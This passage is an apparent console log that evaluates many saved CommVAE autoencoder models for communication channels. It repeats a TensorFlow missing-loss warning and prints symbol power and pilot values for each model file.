The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.208365 Model: 1.208365 1.112429952160681 0.9764562217766724 Pilots : [0.54962828 0.54962828]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317014517.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1683422 Model: 1.1683422 1.0293989468516016 1.1025610253608285 Pilots : [0.5404494 0.5404494]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317014945.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1812631 Model: 1.1812631 1.0805905700788174 1.0116360268325995 Pilots : [0.54342964 0.54342964]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317015431.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1623462 Model: 1.1623462 1.070130281069905 1.0149910434237934 Pilots : [0.53906081 0.53906081]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317015931.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1604922 Model: 1.1604922 1.0751248539345022 1.003978507036364 Pilots : [0.53863071 0.53863071]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317020355.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1849031 Model: 1.1849031 1.07592471678848 1.0235736167061906 Pilots : [0.54426628 0.54426628]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317020821.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1586131 Model: 1.1586131 1.0649516727341353 1.0215946953487183 Pilots : [0.53819446 0.53819446]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317021320.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1682594 Model: 1.1682594 1.0716246558787879 1.017311333786681 Pilots : [0.54043024 0.54043024]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317021720.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1596835 Model: 1.1596835 1.061561436420331 1.0290801436070736 Pilots : [0.538443 0.538443]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317022124.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.156111 Model: 1.156111 1.0578106299020127 1.0331982937070245 Pilots : [0.53761301 0.53761301]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317022524.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1538832 Model: 1.1538832 1.091118898340983 0.9692095875097516 Pilots : [0.53709478 0.53709478]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317022925.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1516418 Model: 1.1516418 1.0831261978316833 0.9816559792130407 Pilots : [0.53657289 0.53657289]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317023326.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1907737 Model: 1.1907737 1.1054304561989556 0.9744653287941614 Pilots : [0.5456129 0.5456129]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317023730.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1712675 Model: 1.1712675 1.087475579728185 0.9904146820731409 Pilots : [0.54112557 0.54112557]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317024138.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1653798 Model: 1.1653798 1.062699974850494 1.0319202417640625 Pilots : [0.53976378 0.53976378]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317024538.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1772053 Model: 1.1772053 1.0561190915125314 1.0554226999590566 Pilots : [0.54249547 0.54249547]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317024940.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1752532 Model: 1.1752532 1.0521543452065036 1.061628377506791 Pilots : [0.54204547 0.54204547]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317025341.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.174046 Model: 1.174046 1.1000714655080306 0.9701599190819084 Pilots : [0.54176703 0.54176703]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317025742.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1553016 Model: 1.1553016 1.080272563615729 0.9899851303702465 Pilots : [0.53742478 0.53742478]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317030147.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1513133 Model: 1.1513133 1.0494034513921924 1.0454627105973253 Pilots : [0.53649634 0.53649634]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317030548.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.173472 Model: 1.173472 1.0683621930503706 1.028100870704393 Pilots : [0.54163457 0.54163457]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317030950.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1672547 Model: 1.1672547 1.061902549891371 1.0351333452122415 Pilots : [0.54019781 0.54019781]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317031350.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1504321 Model: 1.1504321 1.0320034979729145 1.080186278500078 Pilots : [0.53629099 0.53629099]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317031749.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1469859 Model: 1.1469859 1.0771358874095354 0.9885919809663549 Pilots : [0.53548714 0.53548714]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317032150.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.162632 Model: 1.162632 1.0788718140495486 0.9988552891864192 Pilots : [0.53912707 0.53912707]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317032557.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1624156 Model: 1.1624156 1.0809385952114314 0.9948540931202134 Pilots : [0.5390769 0.5390769]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317032957.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1588349 Model: 1.1588349 1.0747052241323238 1.0033278306034192 Pilots : [0.53824598 0.53824598]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317033359.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.210472 Model: 1.210472 1.112927179923234 0.9772850289223064 Pilots : [0.55010726 0.55010726]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317033803.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1715236 Model: 1.1715236 1.1138849353678562 0.9442138580261565 Pilots : [0.54118471 0.54118471]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317034204.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1703916 Model: 1.1703916 1.0576406567137424 1.0462968235736765 Pilots : [0.54092318 0.54092318]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317034605.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1463363 Model: 1.1463363 1.0736301863372881 0.994495046179444 Pilots : [0.53533548 0.53533548]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317035004.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1613793 Model: 1.1613793 1.083182898824969 0.989852548149301 Pilots : [0.53883656 0.53883656]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317035402.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.139956 Model: 1.139956 1.0650731524990094 1.004914731626022 Pilots : [0.53384361 0.53384361]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317035801.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1854372 Model: 1.1854372 1.0888828046586914 0.9998072308107095 Pilots : [0.54438892 0.54438892]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317040203.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1596963 Model: 1.1596963 1.082259379307074 0.9901057215496385 Pilots : [0.53844599 0.53844599]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317040613.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1837821 Model: 1.1837821 1.088257789222352 0.9995584624580213 Pilots : [0.54400875 0.54400875]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317041010.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1831379 Model: 1.1831379 1.0929391176710543 0.9904747847085498 Pilots : [0.54386071 0.54386071]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317041414.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1676059 Model: 1.1676059 1.0681805132386637 1.023309416374065 Pilots : [0.54027907 0.54027907]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317041816.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1979406 Model: 1.1979406 1.0910716725825373 1.0063028877610114 Pilots : [0.54725236 0.54725236]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317042217.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1763849 Model: 1.1763849 1.063452710498282 1.0401909856127562 Pilots : [0.5423064 0.5423064]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317042618.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1452051 Model: 1.1452051 1.076943436876168 0.9874099535319494 Pilots : [0.53507129 0.53507129]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317043014.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1605351 Model: 1.1605351 1.0035368590614504 1.1523691471870963 Pilots : [0.53864067 0.53864067]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317043418.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1643398 Model: 1.1643398 1.08064127081643 0.997049308097721 Pilots : [0.53952289 0.53952289]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317043820.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1745979 Model: 1.1745979 1.0659611321766984 1.0337284433471154 Pilots : [0.54189433 0.54189433]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317044226.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1379267 Model: 1.1379267 1.0250255746247448 1.083040966445428 Pilots : [0.53336824 0.53336824]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317044622.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1696566 Model: 1.1696566 1.0863560127478518 0.9910921667486803 Pilots : [0.54075333 0.54075333]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317045021.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1647913 Model: 1.1647913 1.062277506555238 1.0322197494429508 Pilots : [0.5396275 0.5396275]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317045426.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1760361 Model: 1.1760361 1.084708306132996 0.9995274573674131 Pilots : [0.542226 0.542226]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317045827.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1677775 Model: 1.1677775 1.074975663998246 1.0105617416727295 Pilots : [0.54031878 0.54031878]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317050233.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1367822 Model: 1.1367822 1.05505800124677 1.0212323935218057 Pilots : [0.53309994 0.53309994]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317050633.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1474085 Model: 1.1474085 1.0505399566639153 1.039663762543299 Pilots : [0.53558577 0.53558577]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317051037.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1792362 Model: 1.1792362 1.0839090897131316 1.0037257740584922 Pilots : [0.54296321 0.54296321]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317051438.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1752932 Model: 1.1752932 1.088797356327939 0.991407296031349 Pilots : [0.5420547 0.5420547]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317051840.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1697028 Model: 1.1697028 1.0836328161604045 0.9961189927082291 Pilots : [0.54076399 0.54076399]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317052244.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1636847 Model: 1.1636847 1.1002981135850711 0.9612018481108628 Pilots : [0.5393711 0.5393711]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317052645.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.167018 Model: 1.167018 1.0787170179976897 1.0029112774844033 Pilots : [0.54014305 0.54014305]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317053047.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1626791 Model: 1.1626791 1.083033113982325 0.9912344466786143 Pilots : [0.53913799 0.53913799]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317053449.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1688972 Model: 1.1688972 1.055781823511023 1.0486436678843991 Pilots : [0.54057774 0.54057774]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317053855.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1703337 Model: 1.1703337 1.0566474964137957 1.0482128274613207 Pilots : [0.54090982 0.54090982]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317054257.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1366607 Model: 1.1366607 1.0618895625256586 1.0080269388760756 Pilots : [0.53307145 0.53307145]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317054701.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1778113 Model: 1.1778113 1.0942763233925508 0.9836071987483131 Pilots : [0.54263507 0.54263507]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317055100.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1782321 Model: 1.1782321 1.0614497435679215 1.0457598598743707 Pilots : [0.542732 0.542732]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317055458.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1496513 Model: 1.1496513 1.0761807387622728 0.992648980390986 Pilots : [0.53610896 0.53610896]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317055900.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.163065 Model: 1.163065 1.0617536585775633 1.03170714508535 Pilots : [0.53922745 0.53922745]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317060301.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1726172 Model: 1.1726172 1.0980952956881382 0.9724699653171984 Pilots : [0.54143725 0.54143725]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317060703.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1822586 Model: 1.1822586 1.1033311011257272 0.9711823100991451 Pilots : [0.54365858 0.54365858]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317021443.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6725037 Model: 2.6725037 1.5762498469948392 1.0756431154120016 Pilots : [0.8173897 0.8173897]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317021850.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6869988 Model: 2.6869988 1.5562623694821387 1.1094349598609794 Pilots : [0.81960339 0.81960339]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317022258.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6530776 Model: 2.6530776 1.5118006796119594 1.1608093051459671 Pilots : [0.81441353 0.81441353]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317022705.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6773703 Model: 2.6773703 1.5056533062694542 1.1810233353762603 Pilots : [0.81813359 0.81813359]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317023113.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6212823 Model: 2.6212823 1.5370342189738178 1.1095496195736805 Pilots : [0.80951874 0.80951874]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317023515.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6623464 Model: 2.6623464 1.542655494945882 1.1187335289056288 Pilots : [0.8158349 0.8158349]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317023924.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6199603 Model: 2.6199603 1.5529099582397894 1.0864310321071649 Pilots : [0.80931457 0.80931457]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317024330.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6675086 Model: 2.6675086 1.5421618168988538 1.1216204953736577 Pilots : [0.81662547 0.81662547]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317024735.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.5915399 Model: 2.5915399 1.5341656268463928 1.1010661130616644 Pilots : [0.80491302 0.80491302]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317025139.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6474175 Model: 2.6474175 1.5268733194993593 1.1355765878106259 Pilots : [0.81354434 0.81354434]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317025542.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6135168 Model: 2.6135168 1.5552340468983181 1.080522431064648 Pilots : [0.80831875 0.80831875]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317025952.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6797156 Model: 2.6797156 1.547675116693013 1.1187398540299205 Pilots : [0.81849185 0.81849185]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317030404.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6729019 Model: 2.6729019 1.498007609780257 1.1911185151886239 Pilots : [0.81745059 0.81745059]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317030812.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6572852 Model: 2.6572852 1.5454165050624444 1.1126205536553069 Pilots : [0.81505908 0.81505908]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317031221.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
